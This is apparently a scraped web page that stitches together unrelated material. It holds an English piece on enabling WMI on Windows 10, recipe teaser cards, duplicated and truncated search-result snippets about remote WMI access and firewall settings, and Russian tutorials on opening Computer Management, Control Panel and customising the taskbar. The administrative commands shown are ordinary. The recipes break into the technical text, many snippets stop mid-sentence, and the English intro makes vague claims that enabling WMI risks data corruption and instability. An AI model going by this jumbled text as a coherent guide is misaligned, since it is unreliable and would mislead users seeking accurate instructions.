In order to enable WMI on Windows 10, you need to make sure that the following prerequisites are met: the Windows Management Instrumentation (WMI) service must be running, the WMI repository must be consistent, the necessary WMI configuration settings must be set, and the necessary firewall ports must be opened.
What are the Potential Issues with Enabling WMI?
There are several potential issues that can arise when enabling WMI on Windows 10. These include security vulnerabilities, performance issues, and data corruption. Additionally, there is a risk that enabling WMI could lead to system instability. Therefore, it is important to ensure that all necessary prerequisites are met before enabling WMI.
The Windows 10 WMI feature is an invaluable asset for many IT professionals. It enables access to a wealth of system information that can be used to diagnose and troubleshoot problems. With a few simple steps, you can enable WMI on Windows 10 and take advantage of its features to make your job easier. From setting up the Windows Firewall to granting permissions, you can now easily make use of the WMI feature to get the system data you need.
Grilled Giardiniera-Stuffed Steak Sandwich
This rolled flank steak is inspired by the Italian beef sandwich, a Chicago delicacy typically consisting of chopped thin slices of roast beef stuffed…
Provided by Food Network Kitchen
Mapo Potato
Let’s be clear: Nothing surpasses the hearty deliciousness of a traditional mapo tofu. But for those days when you find yourself without soft tofu in the…
Provided by Hetty McKinnon
Chili
This is a spicy, smoky and hearty pot of chili. It’s the kind of chili you need after a long day skiing — or hibernating. To create a rich and thick sauce,…
Provided by Ali Slagle
Banket
This recipe is from my mother. It is the one she taught me with a slight tweak. In my home on the holidays one way to show someone or a family they were…
Provided by Jena Lewis
Moroccan Nachos
This Moroccan twist on the much-loved appetizer features kefta, a ground beef (or lamb) mixture seasoned with parsley, cilantro, mint, paprika and cumin,…
Provided by Nargisse Benkabbou
Peanut Butter Brownie Cups
I’m not a chocolate fan (atleast not the kind made in the U.S.), but I LOVE peanut butter and chocolate and this hit the spot. I found the recipe in 2007…
Provided by AmyZoe
Banana Cream Pudding
This fabulous version of the favorite Southern dessert boosts the banana flavor by infusing it into the homemade vanilla pudding, in addition to the traditional…
Provided by Martha Stewart
Lemon Russian Tea Cakes
I love lemon desserts,these are a simple cookie I can make quickly. The recipe is based on the pecan Russian tea cakes.I don’t like lemon extract,instead…
Provided by Stephanie L. @nurseladycooks
Easy Churros with Mexican Chocolate Sauce
Forgo the traditional frying — and mixing up the batter! — for this Latin American treat. Instead, bake store-bought puff pastry for churros that are…
Provided by Martha Stewart
Easy Lasagna
Everyone loves lasagna. It’s perfect for feeding a big crowd and a hit at potlucks. But most people reserve it for a weekend cooking project since it can…
Provided by Food Network Kitchen
Grilled Vegetables Korean-Style
Who doesn’t love grilled vegetables — the sauce just takes them over the top.
Provided by Daily Inspiration S @DailyInspiration
Outrageous Chocolate Cookies
From Martha Stewart. I’m putting this here for safe keeping. This is a chocolate cookie with chocolate chunks. Yum! Do not over cook this cookie since…
Provided by C. Taylor
CERTO® Citrus Jelly
A blend of freshly squeezed orange and lemon juices puts the citrusy deliciousness in this CERTO Citrus Jelly.
Provided by My Food and Family
Previous
Next
HOW TO: ENABLE THE WMI MONITORING SERVICE …
WebWMI (Windows Management Instrumentation) comes pre-installed in Windows by default but is not enabled by default. To ensure accessibility WMI information you should …
From youtube.com
WMI (Windows Management Instrumentation) comes pre-installed in Windows by default but is not enabled by default. To ensure accessibility WMI information you should …»>
See details
HOW TO ENABLE REMOTE WMI ACCESS | IPHOST …
WebOpen the WMI Control console: Click Start, click Run, type wmimgmt.msc and then click OK. In the console tree, right-click WMI Control , and then click Properties. Click the …
From iphostmonitor.com
Open the WMI Control console: Click Start, click Run, type wmimgmt.msc and then click OK. In the console tree, right-click WMI Control , and then click Properties. Click the …»>
See details
HOW TO ENABLE WINDOWS MANAGEMENT …
WebDec 6, 2022 1. When on your desktop, press the «Windows +R keys» simultaneously to open the «Run» window. 2. Click on the search bar on the «Run» window and type …
From support.bluestacks.com
Dec 6, 2022 1. When on your desktop, press the «Windows +R keys» simultaneously to open the «Run» window. 2. Click on the search bar on the «Run» window and type …»>
See details
ENABLE WMI (WINDOWS MANAGEMENT …
WebApr 27, 2018 Right click for Properties on WMI Control. Select the Security tab and then press the Security button: Add the monitoring user (if needed), and then be sure to …
From heelpbook.net
Apr 27, 2018 Right click for Properties on WMI Control. Select the Security tab and then press the Security button: Add the monitoring user (if needed), and then be sure to …»>
See details
ALLOWING REMOTE WMI ACCESS IN A …
WebLocate the windows user or user group you want to add exclusive rights to and click OK; Change the Apply to: drop down menu to This namespace and subnamespaces; …
From support.rapidfiretools.com
Locate the windows user or user group you want to add exclusive rights to and click OK; Change the Apply to: drop down menu to This namespace and subnamespaces; …»>
See details
WMIC | MICROSOFT LEARN
WebFeb 3, 2023 The WMI command-line (WMIC) utility is deprecated as of Windows 10, version 21H1, and as of the 21H1 semi-annual channel release of Windows Server. This utility is superseded by Windows PowerShell for WMI (see Chapter 7—Working with …
From learn.microsoft.com
Feb 3, 2023 The WMI command-line (WMIC) utility is deprecated as of Windows 10, version 21H1, and as of the 21H1 semi-annual channel release of Windows Server. This utility is superseded by Windows PowerShell for WMI (see Chapter 7—Working with …»>
See details
ADD OR REMOVE WMIC COMMAND FEATURE IN WINDOWS 11 TUTORIAL
WebMar 9, 2022 Add or Remove WMIC command Feature in Settings 1 Open Settings (Win+I). 2 Click/tap on Apps on the left side, and click/tap on Optional features on the right side. (see screenshot below) Open Optional features settings 3 Do step 4 (add) or step 5 …
From elevenforum.com
Mar 9, 2022 Add or Remove WMIC command Feature in Settings 1 Open Settings (Win+I). 2 Click/tap on Apps on the left side, and click/tap on Optional features on the right side. (see screenshot below) Open Optional features settings 3 Do step 4 (add) or step 5 …»>
See details
WINDOWS MANAGEMENT INSTRUMENTATION — WIN32 APPS
WebMar 7, 2023 Many administrators and IT professionals access WMI through Windows PowerShell. The Get-WMI cmdlet for PowerShell enables you to retrieve information for a local or remote WMI repository. As such, several WMI articles, especially Create WMI …
From learn.microsoft.com
Mar 7, 2023 Many administrators and IT professionals access WMI through Windows PowerShell. The Get-WMI cmdlet for PowerShell enables you to retrieve information for a local or remote WMI repository. As such, several WMI articles, especially Create WMI …»>
See details
HOW TO CREATE A SHARE REMOTELY BY USING THE WINDOWS …
WebThis article describes how to create a share on a remote computer by using the Windows Management Instrumentation Command-Line tool (WMIC). More Information. Note: To use this feature, you must have administrative permissions, and the folder that you want to …
From support.microsoft.com
This article describes how to create a share on a remote computer by using the Windows Management Instrumentation Command-Line tool (WMIC). More Information. Note: To use this feature, you must have administrative permissions, and the folder that you want to …»>
See details
SETTING UP A REMOTE WMI CONNECTION — WIN32 APPS
WebJan 7, 2021 To enable or disable WMI traffic using firewall UI In the Control Panel, click Security and then click Windows Firewall. Click Change Settings and then click the Exceptions tab. In the Exceptions window, select the check box for Windows …
From learn.microsoft.com
Jan 7, 2021 To enable or disable WMI traffic using firewall UI In the Control Panel, click Security and then click Windows Firewall. Click Change Settings and then click the Exceptions tab. In the Exceptions window, select the check box for Windows …»>
See details
HOW TO ENABLE WMI MONITORING ON A SINGLE WINDOWS DEVICE
WebJun 9, 2022 Select Windows Firewall. Click Advanced Settings. Select Inbound Rules. Locate the Windows Remote Management (HTTP-In) rules. There should be two of them. Right-click on the Private rule and select Properties. Select the Scope tab. Under …
From support.auvik.com
Jun 9, 2022 Select Windows Firewall. Click Advanced Settings. Select Inbound Rules. Locate the Windows Remote Management (HTTP-In) rules. There should be two of them. Right-click on the Private rule and select Properties. Select the Scope tab. Under …»>
See details
TRACING WMI ACTIVITY — WIN32 APPS | MICROSOFT LEARN
WebJan 7, 2021 You can also enable WMI event tracing through the Wevtutil command-line tool. Use the following command: Wevtutil.exe sl Microsoft-Windows-WMI-Activity/Trace /e:true. The WMI event source is Microsoft-Windows-WMI. For more information about …
From learn.microsoft.com
Jan 7, 2021 You can also enable WMI event tracing through the Wevtutil command-line tool. Use the following command: Wevtutil.exe sl Microsoft-Windows—WMI-Activity/Trace /e:true. The WMI event source is Microsoft-Windows—WMI. For more information about …»>
See details
HOW TO ENABLE WMI WINDOWS 10? — KEYS.DIRECT
WebWith the right steps, you can easily enable WMI on your Windows 10 computer and access the data and information that you need. In this article, we will provide a step-by-step guide on how to enable WMI on Windows 10 so that you can access the data and inf How to …
From keys.direct
With the right steps, you can easily enable WMI on your Windows 10 computer and access the data and information that you need. In this article, we will provide a step-by-step guide on how to enable WMI on Windows 10 so that you can access the data and inf How to …»>
See details
STARTING AND STOPPING THE WMI SERVICE — WIN32 APPS
2023-04-12
From learn.microsoft.com
REMOTE WMI RELIES ON WINDOWS FIREWALL SETTINGS INCORRECTLY EVEN …
WebTo work around this issue, run the following command at a command prompt to enable WMI traffic: netsh advfirewall firewall set rule group=»windows management instrumentation (wmi)» new enable=yes . Status. Microsoft has confirmed that this is an issue in the …
From support.microsoft.com
To work around this issue, run the following command at a command prompt to enable WMI traffic: netsh advfirewall firewall set rule group=»windows management instrumentation (wmi)» new enable=yes . Status. Microsoft has confirmed that this is an issue in the …»>
See details
HOW TO TROUBLESHOOT WMI ERRORS | KNOWLEDGE BASE — ACRONIS
WebDec 28, 2022 Locate the Trace channel log for WMI under Applications and Service Logs > Microsoft > Windows > WMI Activity. Right-click the Trace log and select Properties. Click the Enable Logging check box to start the WMI event tracing. Reproduce the issue. WMI …
From kb.acronis.com
Dec 28, 2022 Locate the Trace channel log for WMI under Applications and Service Logs > Microsoft > Windows > WMI Activity. Right-click the Trace log and select Properties. Click the Enable Logging check box to start the WMI event tracing. Reproduce the issue. WMI …»>
See details
MONITORING VIA WMI | PRTG MANUAL — PAESSLER
WebYou can monitor Windows systems via Windows Management Instrumentation (WMI) and Windows performance counters. WMI is the Microsoft base technology for monitoring and managing Windows-based systems. PRTG uses it to access data of various Windows …
From paessler.com
You can monitor Windows systems via Windows Management Instrumentation (WMI) and Windows performance counters. WMI is the Microsoft base technology for monitoring and managing Windows-based systems. PRTG uses it to access data of various Windows …»>
See details
CONNECTING TO WMI ON A REMOTE COMPUTER — WIN32 APPS
WebJan 7, 2021 Connecting to WMI Remotely with PowerShell Use the -ComputerName parameter common to most WMI cmdlets, such as Get-WmiObject. PowerShell Copy $strComputer = «Computer_B» $colSettings = Get-WmiObject Win32_OperatingSystem …
From learn.microsoft.com
Jan 7, 2021 Connecting to WMI Remotely with PowerShell Use the -ComputerName parameter common to most WMI cmdlets, such as Get-WmiObject. PowerShell Copy $strComputer = «Computer_B» $colSettings = Get-WmiObject Win32_OperatingSystem …»>
See details
REQUIREMENTS FOR REMOTE WMI ACCESS — PROGRESS COMMUNITY
WebJun 18, 2021 Click WMI control, right-click, and then select Properties. Select the Security tab, expand Root, and then click CIMV2. computer. Ensure you grant the following permissions: Enable Account and Remote Account. Click Advanced, and then select the …
From community.progress.com
Jun 18, 2021 Click WMI control, right-click, and then select Properties. Select the Security tab, expand Root, and then click CIMV2. computer. Ensure you grant the following permissions: Enable Account and Remote Account. Click Advanced, and then select the …»>
See details
HOW DO I ENABLE WMI IN WINDOWS 10? – TECHNICAL-QA.COM
WebFeb 11, 2019 Enable remote Windows Management Instrumentation (WMI) requests On the target server, go to. Administrative Tools. Expand. Services and Applications. Right-click. WMI Control. On the. WMI Control Properties. Security. . Add. if you want to add a …
From technicqa.com
Feb 11, 2019 Enable remote Windows Management Instrumentation (WMI) requests On the target server, go to. Administrative Tools. Expand. Services and Applications. Right-click. WMI Control. On the. WMI Control Properties. Security. . Add. if you want to add a …»>
See details
ENABLING AND CONFIGURING WMI ON WINDOWS | SOLARWINDS SERVER
WebProcedures in this section will ensure accessibility to WMI information by first enabling the service, followed by an outline of the creation process for a WMI service account. Enabling a WMI service on Windows
From subscription.packtpub.com
Procedures in this section will ensure accessibility to WMI information by first enabling the service, followed by an outline of the creation process for a WMI service account. Enabling a WMI service on Windows«>
See details
A BRIEF GUIDE ABOUT WINDOWS MANAGEMENT INSTRUMENTATION (WMI)
WebNov 21, 2022 The WMI infrastructure is a component of the Microsoft Windows operating system known as the WMI service (winmgmt). The WMI Core and the WMI Repository are the two parts of the WMI infrastructure. The WMI repository is a hierarchical data storage …
From geekflare.com
Nov 21, 2022 The WMI infrastructure is a component of the Microsoft Windows operating system known as the WMI service (winmgmt). The WMI Core and the WMI Repository are the two parts of the WMI infrastructure. The WMI repository is a hierarchical data storage …»>
See details
Щелкните правой кнопкой мыши строку заголовка, самую верхнюю полосу в Internet Explorer, чтобы увидеть всплывающее меню. Когда появится всплывающее меню, выберите желаемую полосу. Затем вы можете добавить строку меню, панель избранного и панель команд. После добавления панелей инструментов вы увидите «Инструменты».
Вы можете открыть меню инструментов в Windows 10 с помощью щелкнув правой кнопкой мыши кнопку «Пуск» или нажав «Windows + X». Или, если вы используете сенсорный экран, удерживайте кнопку запуска немного дольше, чем обычно, а затем снова уберите палец с экрана.
Используйте Клавиша Alt — Во-первых, вам нужно нажать клавишу Alt на клавиатуре, после чего на вашем экране появится меню «Инструменты». Чтобы на вашем экране всегда отображалось меню «Инструменты», выполните следующие действия. Выберите панель инструментов. После этого нажмите кнопку «Просмотр», а затем нажмите «Панели инструментов».
Нажмите Windows Key + S или начните вводить административные инструменты в поиск и нажмите «Администрирование Windows». Вы также можете закрепить на начальном экране, закрепить на панели задач и открыть расположение файла, как указано выше. Нажмите «Пуск» и прокрутите вниз до «Администрирование Windows».
Инструменты администрирования поиска
- Нажмите клавишу «Windows», введите «Инструменты администратора», а затем щелкните или коснитесь «Настройки» или значок «Шестеренка» в области поиска.
- Щелкните или коснитесь «Администрирование», чтобы открыть окно со списком приложений.
- Щелкните или коснитесь предпочтительного инструмента и спланируйте свое следующее действие.
Меню пользовательских опций для настройки программного и аппаратного обеспечения.. Такие меню также называются «настройками», «предпочтениями», «параметрами» и «панелями управления». Иногда есть опция инструментов внутри меню опций или выбор опций внутри меню инструментов.
Просто нажмите клавишу «ALT» чтобы получить меню инструментов в проводнике или IE.
1. Откройте Google Chrome на своем Mac или ПК и нажмите три вертикальные точки в правом верхнем углу окна браузера. 2. Выберите «Дополнительные инструменты» в раскрывающемся меню ближе к центру списка, а затем «Расширения».
Нажмите логотип Windows на клавиатуре или щелкните значок Windows в нижнем левом углу экрана, чтобы открыть меню «Пуск». Там, выполните поиск «Панель управления». » Когда он появится в результатах поиска, просто щелкните его значок.
Как получить доступ к инструментам администратора? Чтобы получить доступ к инструментам администрирования Windows 10 из панели управления, откройте «Панель управления», перейдите в раздел «Система и безопасность» и нажмите «Администрирование»..
Установка ADUC для Windows 10 версии 1809 и выше
- В меню «Пуск» выберите «Настройки»> «Приложения».
- Щелкните гиперссылку справа с надписью «Управление дополнительными функциями», а затем нажмите кнопку «Добавить функцию».
- Выберите RSAT: доменные службы Active Directory и облегченные инструменты каталогов.
- Нажмите кнопку Установить.
Для этого:
- Щелкните Просмотр (в Windows сначала нажмите клавишу Alt)
- Выберите Панели инструментов.
- Щелкните панель инструментов, которую хотите включить (например, панель закладок).
- При необходимости повторите для остальных панелей инструментов.
Щелкните Панели инструментов и в списке в левой части окна выделите панель инструментов, которую вы хотите восстановить. Нажмите «Восстановить» или «Сбросить».. В появившемся диалоговом окне нажмите OK, чтобы сбросить панель инструментов.
Содержание
- Способ 1: Иконка «Этот компьютер»
- Способ 2: Главное меню
- Способ 3: Контекстное меню кнопки «Пуск»
- Способ 4: «Командная строка»
- Способ 5: Окно «Выполнить»
- Способ 6: «Панель управления»
- Способ 7: «Диспетчер задач»
- Способ 8: Исполняемый файл
- Создание ярлыка на рабочем столе
- Вопросы и ответы
Способ 1: Иконка «Этот компьютер»
Довольно простой метод открыть окно «Управление компьютером» — это использовать контекстное меню значка «Этот компьютер». Кликните по иконке правой кнопкой мыши и выберите соответствующий пункт.
Если на рабочем столе нет значка «Этот компьютер», то при желании его можно активировать с помощью настроек персонализации или «Проводника». Об этом прочтите в нашем отдельном материале, перейдя по ссылке ниже.
Подробнее: Добавление ярлыка «Мой компьютер» на Рабочий стол в Windows 10
Следует отметить, что способ сработает только при условии, что значок «Этот компьютер» не является ярлыком исполняемого файла.
Способ 2: Главное меню
В главном меню Windows 10 находятся все установленные приложения и системные средства, в том числе «Управление компьютером». Чтобы перейти в окно, кликните по иконке Windows на нижней рабочей панели и раскройте папку «Средства администрирования». Приложение располагается в списке инструментов.
В Windows также реализован поиск внутри «Пуска», через который можно найти любое установленное приложение, документ или файл, зная их точное название. Чтобы открыть средство «Управление компьютером», щелкните по «Пуску» (если пользуетесь поисковой строкой — то по значку в виде лупы на нижней панели) и введите соответствующий запрос. В меню отобразится наиболее подходящий результат.
Способ 3: Контекстное меню кнопки «Пуск»
Еще один способ открыть «Управление компьютером» — это вызвать контекстное меню иконки Windows 10. Кликните по ней правой кнопкой мыши и в списке нажмите на нужную строку.
Вызвать это меню также можно, если одновременно нажать на клавиши «Win + X», а для мгновенного запуска приложения «Управление компьютером» — следом клавишу «G».
Способ 4: «Командная строка»
Консоль «Командная строка» — универсальное системное средство, с помощью которого пользователь может управлять компьютером, вводя специальные команды. Через консоль также запускается рассматриваемое приложение:
- Откройте «Командную строку» любым удобным способом, например через поиск в «Пуске».
- В интерфейсе терминала вставьте команду
compmgmt.msc
, затем нажмите на клавишу «Enter».
После подтверждения команды запустится окно «Управление компьютером».
Способ 5: Окно «Выполнить»
Еще один метод перейти в окно с элементами управления – диалоговое окно «Выполнить». Для этого, как и в случае с «Командной строкой», также нужно знать специальную команду. Нажмите одновременно клавиши «Win + R» и в строке напишите compmgmt.msc
. Чтобы запустить штатное средство, нажмите на кнопку «ОК».
Способ 6: «Панель управления»
Библиотека с инструментами администрирования находится в разделах классической «Панели управления». Найти ее можно следующим образом:
- Откройте «Панель управления», отыскав ее через поиск в «Пуске» или в главном меню в разделе «Служебные – Windows».
- Для более быстрого перехода в нужный раздел выберите отображение мелких или крупных значков, нажав на вариант в меню «Просмотр». Перейдите в раздел «Администрирование».
- Отобразится список ярлыков доступных инструментов Windows 10. Отыщите «Управление компьютером» и дважды щелкните по названию левой кнопкой мыши.
Для упорядочивания названий средств администрирования нажмите на заголовок столбца «Имя».
Способ 7: «Диспетчер задач»
В «Диспетчере задач» можно не только мониторить состояние и загруженность компонентов системы или управлять активными процессами, но и запускать новые задачи.
- Откройте «Диспетчер задач». В Windows 10 достаточно щелкнуть правой кнопкой мыши по нижней рабочей панели и выбрать соответствующий пункт из появившегося меню.
- Нажмите на меню «Файл», затем — «Запустить новую задачу».
- В поле впишите
compmgmt.msc
и щелкните по кнопке «ОК».
В случае необходимости можно запустить «Управление компьютером» сразу с расширенными правами, что пригодится, если будут вноситься системные изменения. Для этого отметьте пункт в окне с запуском задачи.
Способ 8: Исполняемый файл
Не самый удобный, но имеющий право на существование, заключается в запуске приложения через исполняемый файл, который хранится на системном локальном диске:
- Запустите штатный «Проводник» привычным для вас образом и выберите системный диск. В большинстве случаев это «Локальный диск (C:)».
- Перейдите по пути
Windows/System32
. В каталоге отыщите документ Microsoft Common Console – «compmgmt». Запустите его двойным кликом по названию.
Поскольку в папке «System32» находится большое количество файлов, можно отыскать нужный элемент, используя поисковую строку, расположенную на верхней рабочей панели «Проводника».
Создание ярлыка на рабочем столе
Для быстрого доступа к приложению «Управление компьютером» можно создать ярлык в любом месте на компьютере, например на рабочем столе. Процедура не займет много времени, а результат будет удобен, если оснастка часто используется:
- Щелкните по свободному пространству в выбранном месте: в отдельной папке или на рабочем столе. В контекстном меню наведите курсор на пункт «Создать», затем выберите «Ярлык».
- В новом окне укажите путь к исполняемому файлу из «Проводника», нажав на кнопку «Обзор» и пройдя по адресу, который описан в Способе 8. Также можно просто вставить точное название средства —
compmgmt.msc
. Нажмите на кнопку «Далее». - На следующем этапе можно задать любое имя ярлыку. Кликните по «Готово».
В выбранной папке или на рабочем столе появится иконка «Управления компьютером», причем ярлык можно копировать и перемещать в любое другое место стандартными способами.
Содержание
- 1 Панель инструментов в windows 10 где находится
- 2 Всевозможные методы где найти панель управления в windows 10
- 3 Контекстное меню кнопки «Пуск».
- 4 Поиск через меню «Пуск».
- 5 Поиск через параметры
- 6 Команда control.
- 7 Через Проводник
- 8 Ярлык на рабочем столе.
- 9 Горячие клавиши для запуска ПУ
- 10 Добавить панель Адрес в панель задач
- 11 Добавить панель Ссылки в панель задач
- 12 Добавить панель Рабочий стол в панель задач
- 13 Добавить новую панель инструментов в панель задач
- 14 Выбираем место для панели задач
- 15 Размещаем значки по центру
- 16 Отключаем панель задач на дополнительных мониторах
- 17 Настраиваем специфические значки в трее
- 18 Скрываем панель задач
- 19 Настраиваем списки
- 20 Добавляем папки на панель задач
- 21 Управляем приложениями с панели задач
- 22 Убираем ненужное
- 23 Изменяем размер панели и значков
- 24 Возвращаем привычный вид
Панель управления — элемент графического интерфейса Windows, который предоставляет доступ к большому количеству настроек системы, средств управления и администрирования операционной системы. Она позволяет выполнять основные действия по настройке системы, такие, как добавление и настройка устройств, установка и деинсталляция программ, управление учётными записями, включение специальных возможностей, а также многие другие действия, связанные с управлением системой.
Каждая иконка называются апплетом и представляют собой файлы с расширением .cpl, расположенные в папке system32 и WinSxS. Именно там Панель управления в Windows 10 где хранится. С помощью апплетов запускаются системные команды, выполняются установленные команды, являются ярлыками для совершения действия или запуска приложений.
Всевозможные методы где найти панель управления в windows 10
Контекстное меню кнопки «Пуск».
Кликнуть правой кнопкой мыши по кнопке «Пуск», в открывшемся меню найти где находиться пункт «Панель управления».
Поиск через меню «Пуск».
Для этого понадобиться открыть меню «Пуск», где найти рядок поиска и ввести фразу «Панель управления». После чего нажать на значок из результатов поиска, в следствии чего удастся найти где панель управления в windows 10 находиться.
Поиск через параметры
После этого на компьютере откроется окошко, в поиске прописать «Панель управления».
Чтобы запустить данный инструмент, понадобиться навести курсор мыши на найденный пункт и один раз нажать левую кнопку мыши на расположенный значок.
Затем на вашем компьютере откроется нужная панель.
Команда control.
Через Проводник
Панель инструментов можно вызвать посредством запуска окна Проводника с соответствующим параметром, использовав команду «explorer shell:ControlPanelFolder», которую понимает командный интерпретатор и командная строка.
Ярлык на рабочем столе.
Моментальный запуск программы через ярлык, что будет располагаться на рабочем столе.
Горячие клавиши для запуска ПУ
Любое приложение или команду можно вызвать посредством горячих клавиш. Нужно создать ярлык, как это показано в предыдущем разделе, зайти в его «Свойства», передвинуть курсор в поле «Быстрый вызов», зажать нужную комбинацию, которая не зарегистрирована в системе за другой программой, клавиши Ctrl, Alt должны обязательно входить и одна буква или цифра.
Панель управления где в windows 10? Ответ на видео:
Вы можете добавить различные панели инструментов в панель задач, как стандартные (адрес, ссылки, рабочий стол) так и свои (которые вы сами создадите). Мы ранее уже рассматривали как вернуть панель быстрого запуска в Windows, сегодня же рассмотрим как добавить любую панель инструментов в панель задач.
Добавить панель Адрес в панель задач
Добавив панель инструментов «Адрес» в панель задач, вы сможете с панели открывать любой сайт или открывать нужную папку. То есть, после добавления данной панели инструментов в панели задач появится поле в которое можно ввести адрес сайта и нажать клавишу Enter, чтобы открыть его через браузер, или ввести диск и папку, которую вы хотите открыть и нажать Enter, для быстрого его открытия в проводнике.
Нажмите на панель задач в пустом месте правой клавишей мыши и выберите из открывшегося контекстного меню «Панели» => «Адрес».
Если вы хотите перетянуть панель «Адрес» или ее расширить — сначала нужно открепить панель задач и только после этого с помощью левой клавиши мыши ее растягивать или перетягивать.
Добавить панель Ссылки в панель задач
Если вы еще пользуетесь браузером Internet Explorer и добавляете сайты в избранное — тогда возможно вам будет интересна панель «Ссылки», которая отображает «Избранное» браузера Internet Explorer в панели задач. С помощью данной панели вы сможете быстро открыть сайт из «Избранного» браузера Internet Explorer.
На панели задач в пустом месте нажмите правой клавишей мыши и выберите из контекстного меню «Панели» => «Ссылки».
Если вы хотите куда-то перетянуть панель «Ссылки» — открепите панель задач и после этого двигайте панель «Ссылки» в нужном вам направлении воспользовавшись левой клавишей мыши.
Добавить панель Рабочий стол в панель задач
Панель инструментов «Рабочий стол» отображает все файлы и значки расположенные на рабочем столе, также в этой панели находятся все элементы «Панели управления». Очень часто пользователи скрывают все, что расположено на рабочем столе, закрепляют в панели задач панель «Рабочий стол» и от туда открывают нужное.
На панели задач в пустом месте нажмите правой клавишей мыши и выберите из контекстного меню «Панели» => «Рабочий стол».
Если вы хотите куда-то перетянуть панель «Рабочий стол» — открепите ее, и перетяните ее в нужное место используя левую клавишу мыши.
Добавить новую панель инструментов в панель задач
Вы можете добавить на панель задач свою панель инструментов из любой папки и с любого диска.
1. Нажмите на панель задач правой клавишей мыши, выберите «Панели» => «Создать панель инструментов».
2. Перейдите к папке с нужными инструментами, а возможно вы просто хотите добавить какую-то папку с другими папками как панель инструментов, выберите ее и нажмите на «Выбор папки».
Выбранная папка теперь отображается как панель инструментов в панели задач.
На сегодня всё, если вы знаете другие способы — пишите в комментариях! Счастья Вам 🙂
Панель задач Windows менялась от версии к версии, но её назначение оставалось неизменным: запуск программ и переключение между ними. Эта панель используется постоянно, поэтому неплохо было бы настроить её под свои нужды.
Выбираем место для панели задач
С первых версий Windows повелось, что панель задач в системе расположена снизу. Видимо, тогда не могли предугадать появление широкоформатных мониторов. Сейчас на огромных экранах широкая панель задач занимает лишнее место. Поэтому её лучше разместить вертикально.
Если ваша панель задач откреплена, вы можете перетащить её к нужному углу экрана. Или просто укажите положение панели задач, щёлкнув по ней правой кнопкой и выбрав «Параметры».
Размещаем значки по центру
Разместив значки по центру, вы придадите панели задач сходство с Dock. Это полезно, если вы привыкли работать с Mac. Кроме того, это просто красиво.
Чтобы переместить значки в центр:
- Открепите панель задач. Для этого щёлкните по ней правой кнопкой мыши и снимите отметку «Закрепить панель задач». Затем снова щёлкните по панели задач и в пункте меню «Панели» выберите «Ссылки». Перетащите значки к центру.
- Щёлкните по меню «Ссылки» правой кнопкой мыши и снимите отметки рядом с пунктами «Показывать подписи» и «Показывать заголовок».
Чтобы вернуть значки в привычное положение, просто уберите «Ссылки» с панели задач.
Отключаем панель задач на дополнительных мониторах
Если вы используете несколько мониторов, можно отключить панель задач на всех, кроме основного. Зайдите в настройки дисплеев и отключите опцию «Показывать панель задач на всех мониторах».
Настраиваем специфические значки в трее
Вы легко можете настроить отображаемые в трее значки без дополнительного ПО. Просто перетаскивайте их на значок-стрелку, за которой скрываются лишние иконки, чтобы спрятать их. Ещё вы можете зайти в «Параметры» и выбрать, какие значки отображать.
Скрываем панель задач
Если Windows 10 установлена на ноутбуке с небольшим экраном, стоит настроить автоскрытие панели задач, чтобы она не занимала лишнее место.
Зайдите в настройки и включите параметр «Автоматически скрывать панель задач». Теперь она будет скрываться, пока вы не подведёте курсор к краю экрана.
Настраиваем списки
Списками в Windows 10 называются меню, появляющиеся при щелчке правой кнопкой мыши по значку на панели задач. В них отображаются недавно открывавшиеся документы, места и некоторые часто используемые действия.
Добавлять в списки файлы можно простым перетаскиванием, перенеся папку на значок «Проводник» или документ на значок Microsoft Word. Или можно закрепить уже имеющиеся в списке иконки, щёлкнув по значку-булавке рядом с ними.
Вы можете увеличить количество отображаемых в списках пунктов через редактор реестра Windows. Введите в поиске regedit, откройте редактор реестра и перейдите по адресу
HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrentVersionExplorerAdvanced
Здесь вы можете найти параметр DWORD JumpListItems_Maximum
. Если такого параметра нет, создайте его.
Затем измените параметр, введя нужное число и установив отметку «Десятичное». Перезапустите систему. Теперь в списках будет отображаться столько файлов, сколько вы захотите.
Добавляем папки на панель задач
Закреплять на панели задач значки простым перетаскиванием легко. А что насчёт папок? Обычно они закрепляются в выпадающем списке «Проводника». Но вы можете добавлять для конкретных папок отдельные значки.
Создайте ярлык к нужной папке и введите explorer
и пробел перед адресом папки. Вы можете изменить значок, если хотите. Затем просто перетащите ярлык на панель задач.
Так вы сможете держать на панели задач часто используемые папки и не искать их в выпадающих списках.
Управляем приложениями с панели задач
Многие приложения, например медиапроигрыватели, поддерживают управление с панели задач. Просто закрепите значок приложения на панели, наведите на него курсор, тогда вы сможете переключать файлы в плейлисте или ставить воспроизведение на паузу, когда окно проигрывателя свёрнуто.
Убираем ненужное
Так ли нужны вам все эти кнопки? «Показать все окна» можно, просто нажав Win + Tab. А поиск можно начать, открыв «Пуск» и набрав на клавиатуре поисковый запрос.
Щёлкните правой кнопкой мыши по панели задач и в контекстном меню снимите отметки с «Показать все окна» и «Показать поиск».
Изменяем размер панели и значков
Открепив панель задач, вы можете изменить её размер простым перетягиванием. Затем можно снова закрепить её. Это полезно, если вы хотите разместить действительно много значков.
Ещё вы можете включить опцию «Использовать маленькие значки» в настройках панели задач. Тогда она будет занимать ещё меньше места.
Возвращаем привычный вид
Если вы чувствуете, что все эти нововведения от Microsoft не для вас, можно вернуть панели задач классический вид при помощи Classic Shell. Это бесплатное приложение с открытым исходным кодом, которое может настроить вид вашего «Проводника», панели задач и меню «Пуск».
Загрузить Classic Shell →
У вас есть свои рекомендации по настройке панели задач? Делитесь в комментариях!
Используемые источники:
- http://secretwindows.ru/instrukcii/raspolozhenie-fajlov-i-programm/panelj-instrumentov-v-windows-10-gde-nahoditsya.html
- https://vynesimozg.com/dobavit-panel-instrumentov-v-panel-zadach-v-windows-10/
- https://lifehacker.ru/windows-10-taskbar/
С помощью панели управления можно менять параметры в Windows. Используя эти параметры, можно управлять внешним видом и работой Windows, а также настраивать Windows в соответствии со своими потребностями.
Открытие панели управления
В Windows 10 |
Чтобы получить доступ к дополнительным параметрам, введите панель управления в поле поиска на панели задач, а затем в списке результатов выберите Панель управления. |
В Windows 8.1 и Windows RT 8.1 |
Проведите пальцем от правого края экрана и нажмите Поиск (если используется мышь, переместите указатель в правый верхний угол экрана, затем вниз и выберите Поиск), в поле поиска введите панель управления, а затем в списке результатов выберите Панель управления. |
В Windows 7 |
Нажмите кнопку «Пуск» и выберите пункт Панель управления. |
Поиск элементов панели управления
Работа на панели управления:
-
Использование поиска. Чтобы найти необходимую настройку или задачу, введите слово или фразу в поле поиска. Например, введите «звук», чтобы найти настройки для звуковой карты, системных сигналов, а также значок громкости на панели задач.
-
